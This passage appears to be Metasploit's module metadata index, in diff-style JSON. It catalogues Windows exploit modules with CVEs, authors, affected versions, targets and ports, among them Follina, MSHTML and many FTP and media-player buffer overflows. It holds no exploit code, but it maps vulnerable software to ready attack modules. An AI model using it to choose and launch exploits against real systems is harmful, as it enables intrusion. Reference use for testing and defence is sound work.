"exploit_windows/fileformat/wm_downloader_m3u": { - "name": "WM Downloader 3.1.2.2 Buffer Overflow", - "fullname": "exploit/windows/fileformat/wm_downloader_m3u", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-28", - "type": "exploit", - "author": [ - "fdisk", - "dookie" - ], - "description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-66911", - "EDB-14497" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/wm_downloader_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/word_msdtjs_rce": { - "name": "Microsoft Office Word MSDTJS", - "fullname": "exploit/windows/fileformat/word_msdtjs_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-05-29", - "type": "exploit", - "author": [ - "nao sec", - "mekhalleh (RAMELLA Sébastien)", - "bwatters-r7" - ], - "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.", - "references": [ - "CVE-2022-30190", - "URL-https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/", - "URL-https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19", - "URL-https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "URL-https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", - "URL-https://twitter.com/GossiTheDog/status/1531608245009367040", - "URL-https://github.com/JMousqueton/PoC-CVE-2022-30190" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Word" - ], - "mod_time": "2024-05-28 14:01:31 +0000", - "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/word_msdtjs_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Follina" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/word_mshtml_rce": { - "name": "Microsoft Office Word Malicious MSHTML RCE", - "fullname": "exploit/windows/fileformat/word_mshtml_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-09-23", - "type": "exploit", - "author": [ - "lockedbyte", - "klezVirus", - "thesunRider", - "mekhalleh (RAMELLA Sébastien)" - ], - "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.", - "references": [ - "CVE-2021-40444", - "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", - "URL-https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/", - "URL-http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf", - "URL-https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md", - "URL-https://github.com/klezVirus/CVE-2021-40444" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Hosted" - ], - "mod_time": "2024-05-28 14:01:31 +0000", - "path": "/modules/exploits/windows/fileformat/word_mshtml_rce.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/word_mshtml_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/xenorate_xpl_bof": { - "name": "Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/xenorate_xpl_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-08-19", - "type": "exploit", - "author": [ - "hack4love ", - "germaya_x", - "loneferret", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Xenorate 2.50\n by creating a specially crafted xpl file.", - "references": [ - "OSVDB-57162", - "EDB-10371" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 / SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/xenorate_xpl_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/xion_m3u_sehbof": { - "name": "Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/xion_m3u_sehbof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-23", - "type": "exploit", - "author": [ - "hadji samir ", - "corelanc0d3r ", - "digital1", - "jduck ", - "m_101" - ], - "description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n 1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n contains an overly long string. This results in overwriting a\n structured exception handler record.", - "references": [ - "OSVDB-66912", - "EDB-14517", - "EDB-14633", - "EDB-15598" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Xion Audio Player v1.0.126 XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/xion_m3u_sehbof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/xradio_xrl_sehbof": { - "name": "xRadio 0.95b Buffer Overflow", - "fullname": "exploit/windows/fileformat/xradio_xrl_sehbof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-08", - "type": "exploit", - "author": [ - "b0telh0 " - ], - "description": "This module exploits a buffer overflow in xRadio 0.95b.\n Using the application to import a specially crafted xrl file,\n a buffer overflow occurs allowing arbitrary code execution.", - "references": [ - "CVE-2008-2789", - "BID-46290", - "EDB-16141" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/xradio_xrl_sehbof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/zahir_enterprise_plus_csv": { - "name": "Zahir Enterprise Plus 6 Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/zahir_enterprise_plus_csv", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-09-28", - "type": "exploit", - "author": [ - "f3ci", - "modpr0be" - ], - "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.", - "references": [ - "CVE-2018-17408", - "EDB-45505" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Zahir Enterprise Plus 6 <= build 10b" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/zahir_enterprise_plus_csv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/zinfaudioplayer221_pls": { - "name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/zinfaudioplayer221_pls", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-09-24", - "type": "exploit", - "author": [ - "Trancek ", - "aushack " - ], - "description": "This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Zinf.\n This functionality has not been tested in this module.", - "references": [ - "CVE-2004-0964", - "OSVDB-10416", - "EDB-7888", - "BID-11248" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Zinf Universal 2.2.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/zinfaudioplayer221_pls", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/firewall/blackice_pam_icq": { - "name": "ISS PAM.dll ICQ Parser Buffer Overflow", - "fullname": "exploit/windows/firewall/blackice_pam_icq", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-03-18", - "type": "exploit", - "author": [ - "spoonm " - ], - "description": "This module exploits a stack buffer overflow in the ISS products that use\n the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n will result in arbitrary code execution as LocalSystem. This exploit\n only requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n address.\n\n The ISS exception handler will recover the process after each overflow, giving\n us the ability to bruteforce the service and exploit it multiple times.", - "references": [ - "CVE-2004-0362", - "OSVDB-4355", - "URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html" - ], - "platform": "Windows", - "arch": "", - "rport": 1, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Bruteforce", - "Bruteforce iis-pam1.dll", - "Bruteforce NT 4.0", - "iis-pam1.dll 3.6.06", - "iis-pam1.dll 3.6.11", - "WinNT SP3/SP4/SP5", - "WinNT SP4/SP5", - "WinNT SP5/SP6 - advapi32", - "WinNT SP3/SP5/SP6 - shell32", - "WinNT SP5/SP6 - mswsock", - "WinXP SP0/SP1 - shell32", - "WinXP SP0/SP1 - atl", - "WinXP SP0/SP1 - atl", - "WinXP SP0/SP1 - ws2_32", - "WinXP SP0/SP1 - mswsock", - "Windows 2000 Pro SP4 English", - "Win2000 SP0 - SP4", - "Win2000 SP2/SP3 - samlib", - "Win2000 SP0/SP1 - activeds", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English", - "WinXP SP0 - SP1", - "Win2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/firewall/blackice_pam_icq.rb", - "is_install_path": true, - "ref_name": "windows/firewall/blackice_pam_icq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/firewall/kerio_auth": { - "name": "Kerio Firewall 2.1.4 Authentication Packet Overflow", - "fullname": "exploit/windows/firewall/kerio_auth", - "aliases": [], - "rank": 200, - "disclosure_date": "2003-04-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Kerio Personal Firewall\n administration authentication process. This module has only been tested\n against Kerio Personal Firewall 2 (2.1.4).", - "references": [ - "CVE-2003-0220", - "OSVDB-6294", - "BID-7180" - ], - "platform": "Windows", - "arch": "", - "rport": 44334, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/firewall/kerio_auth.rb", - "is_install_path": true, - "ref_name": "windows/firewall/kerio_auth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/32bitftp_list_reply": { - "name": "32bit FTP Client Stack Buffer Overflow ", - "fullname": "exploit/windows/ftp/32bitftp_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "fancy", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n download a file that has an overly long filename.", - "references": [ - "OSVDB-68703", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/32bitftp_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/3cdaemon_ftp_user": { - "name": "3Com 3CDaemon 2.0 FTP Username Overflow", - "fullname": "exploit/windows/ftp/3cdaemon_ftp_user", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-01-04", - "type": "exploit", - "author": [ - "hdm ", - "otr" - ], - "description": "This module exploits a vulnerability in the 3Com 3CDaemon\n FTP service. This package is being distributed from the 3Com\n web site and is recommended in numerous support documents.\n This module uses the USER command to trigger the overflow.", - "references": [ - "CVE-2005-0277", - "OSVDB-12810", - "OSVDB-12811", - "BID-12155" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows NT 4.0 SP4/SP5/SP6", - "Windows 2000 Pro SP4 French", - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/3cdaemon_ftp_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/aasync_list_reply": { - "name": "AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)", - "fullname": "exploit/windows/ftp/aasync_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n processing the response on a LIST command. During the overflow, a structured exception\n handler record gets overwritten.", - "references": [ - "OSVDB-68701", - "EDB-16738", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/aasync_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/aasync_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ability_server_stor": { - "name": "Ability Server 2.34 STOR Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ability_server_stor", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-10-22", - "type": "exploit", - "author": [ - "muts", - "Dark Eagle", - "Peter Osterberg" - ], - "description": "This module exploits a stack-based buffer overflow in Ability Server 2.34.\n Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,\n which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.\n\n The vulnerability has been confirmed on version 2.34 and has also been reported\n in version 2.25 and 2.32. Other versions may also be affected.", - "references": [ - "CVE-2004-1626", - "OSVDB-11030", - "EDB-588" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows XP SP2 ENG", - "Windows XP SP3 ENG" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/ability_server_stor.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ability_server_stor", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/absolute_ftp_list_bof": { - "name": "AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/absolute_ftp_list_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-09", - "type": "exploit", - "author": [ - "Node" - ], - "description": "This module exploits VanDyke Software AbsoluteFTP by overflowing\n a filename buffer related to the LIST command.", - "references": [ - "CVE-2011-5164", - "OSVDB-77105", - "EDB-18102" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/absolute_ftp_list_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ayukov_nftp": { - "name": "Ayukov NFTP FTP Client Buffer Overflow", - "fullname": "exploit/windows/ftp/ayukov_nftp", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-10-21", - "type": "exploit", - "author": [ - "Berk Cem Goksel", - "Daniel Teixeira", - "sinn3r " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP\n Client 2.0 and earlier. By responding with a long string of data for the SYST request, it\n is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote\n code exeuction under the context of the user if successfully exploited.", - "references": [ - "CVE-2017-15222", - "EDB-43025" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ayukov_nftp.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ayukov_nftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/bison_ftp_bof": { - "name": "BisonWare BisonFTP Server Buffer Overflow", - "fullname": "exploit/windows/ftp/bison_ftp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-07", - "type": "exploit", - "author": [ - "localh0t", - "veerendragg ", - "Jay Turla" - ], - "description": "BisonWare BisonFTP Server 3.5 is prone to an overflow condition.\n This module exploits a buffer overflow vulnerability in the said\n application.", - "references": [ - "CVE-1999-1510", - "BID-49109", - "EDB-17649", - "URL-http://secpod.org/msf/bison_server_bof.rb" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Bisonware FTP Server / Windows XP SP3 EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/bison_ftp_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/bison_ftp_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/cesarftp_mkd": { - "name": "Cesar FTP 0.99g MKD Command Buffer Overflow", - "fullname": "exploit/windows/ftp/cesarftp_mkd", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-06-12", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n You must have valid credentials to trigger this vulnerability. Also, you\n only get one chance, so choose your target carefully.", - "references": [ - "CVE-2006-2961", - "OSVDB-26364", - "BID-18586", - "URL-http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows 2000 Pro SP4 French", - "Windows XP SP2/SP3 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/ftp/cesarftp_mkd.rb", - "is_install_path": true, - "ref_name": "windows/ftp/cesarftp_mkd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/comsnd_ftpd_fmtstr": { - "name": "ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability", - "fullname": "exploit/windows/ftp/comsnd_ftpd_fmtstr", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-06-08", - "type": "exploit", - "author": [ - "ChaoYi Huang ", - "rick2600 ", - "mr_me ", - "corelanc0d3r " - ], - "description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n crafted format string specifier as a username. The crafted username is sent to the server to\n overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer\n is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.\n The SEH exit function is preferred so that the administrators are not left with an unhandled\n exception message. When using the meterpreter payload, the process will never die, allowing\n for continuous exploitation.", - "references": [ - "OSVDB-82798", - "EDB-19024" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3 - English", - "Windows Server 2003 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb", - "is_install_path": true, - "ref_name": "windows/ftp/comsnd_ftpd_fmtstr", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/dreamftp_format": { - "name": "BolinTech Dream FTP Server 1.02 Format String", - "fullname": "exploit/windows/ftp/dreamftp_format", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-03-03", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a format string overflow in the BolinTech\n Dream FTP Server version 1.02. Based on the exploit by SkyLined.", - "references": [ - "CVE-2004-2074", - "OSVDB-4986", - "BID-9800", - "EDB-823" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Dream FTP Server v1.02 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/dreamftp_format.rb", - "is_install_path": true, - "ref_name": "windows/ftp/dreamftp_format", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyfilesharing_pass": { - "name": "Easy File Sharing FTP Server 2.0 PASS Overflow", - "fullname": "exploit/windows/ftp/easyfilesharing_pass", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Easy File Sharing 2.0\n service. By sending an overly long password, an attacker can execute\n arbitrary code.", - "references": [ - "CVE-2006-3952", - "OSVDB-27646", - "BID-19243" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro English ALL", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyfilesharing_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyfilesharing_pass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyftp_cwd_fixret": { - "name": "EasyFTP Server CWD Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/easyftp_cwd_fixret", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-16", - "type": "exploit", - "author": [ - "Paul Makowski ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n leads to a stack based buffer overflow. EasyFTP allows anonymous access by\n default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.", - "references": [ - "OSVDB-62134", - "BID-38262", - "URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/", - "URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit", - "URL-https://seclists.org/bugtraq/2010/Feb/202" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows Universal - v1.7.0.2", - "Windows Universal - v1.7.0.3", - "Windows Universal - v1.7.0.4", - "Windows Universal - v1.7.0.5", - "Windows Universal - v1.7.0.6", - "Windows Universal - v1.7.0.7", - "Windows Universal - v1.7.0.8", - "Windows Universal - v1.7.0.9", - "Windows Universal - v1.7.0.10", - "Windows Universal - v1.7.0.11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyftp_cwd_fixret", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyftp_list_fixret": { - "name": "EasyFTP Server LIST Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/easyftp_list_fixret", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-07-05", - "type": "exploit", - "author": [ - "Karn Ganeshan ", - "MFR", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n credit goes to Karn Ganeshan.\n\n NOTE: Although, this is likely to exploit the same vulnerability as the\n 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.", - "references": [ - "OSVDB-62134", - "EDB-14400", - "EDB-14451" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3 - Version 2002" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyftp_list_fixret", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyftp_mkd_fixret": { - "name": "EasyFTP Server MKD Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/easyftp_mkd_fixret", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-04-04", - "type": "exploit", - "author": [ - "x90c ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n leads to a stack based buffer overflow.\n\n NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n 'MKD' command, you must have access to an account that can create directories.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.", - "references": [ - "OSVDB-62134", - "EDB-12044", - "EDB-14399" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows Universal - v1.7.0.2", - "Windows Universal - v1.7.0.3", - "Windows Universal - v1.7.0.4", - "Windows Universal - v1.7.0.5", - "Windows Universal - v1.7.0.6", - "Windows Universal - v1.7.0.7", - "Windows Universal - v1.7.0.8", - "Windows Universal - v1.7.0.9", - "Windows Universal - v1.7.0.10", - "Windows Universal - v1.7.0.11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyftp_mkd_fixret", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/filecopa_list_overflow": { - "name": "FileCopa FTP Server Pre 18 Jul Version", - "fullname": "exploit/windows/ftp/filecopa_list_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-19", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits the buffer overflow found in the LIST command\n in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch", - "references": [ - "CVE-2006-3726", - "OSVDB-27389", - "BID-19065" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - 